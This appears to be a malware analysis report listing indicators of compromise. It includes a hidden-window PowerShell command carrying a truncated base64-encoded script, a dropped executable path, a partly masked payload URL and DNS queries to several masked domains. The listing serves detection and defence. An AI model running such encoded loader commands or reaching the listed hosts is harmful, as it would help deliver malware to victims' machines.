Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABRAGUAaABzAGIAaABlAGwAZAB6AGcAPQAnAEgAcAB2AHMAagBxAHQAYgAnADsAJABSAGgAcwBlAGMAcQBmAGYAIAA9ACAAJwA2AD...
- %HOMEPATH%\687.exe
- http://me#####.nmconline.org/wp-content/pgynuy3gyq-qib01-12349/
- DNS ASK me#####.nmconline.org
- DNS ASK ho####earlane.com
- DNS ASK ra######.000webhostapp.com
- DNS ASK ro#########orsdesign.000webhostapp.com
- DNS ASK st####hpilates.fit
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABRAGUAaABzAGIAaABlAGwAZAB6AGcAPQAnAEgAcAB2AHMAagBxAHQAYgAnADsAJABSAGgAcwBlAGMAcQBmAGYAIAA9ACAAJwA2AD...' (with hidden window)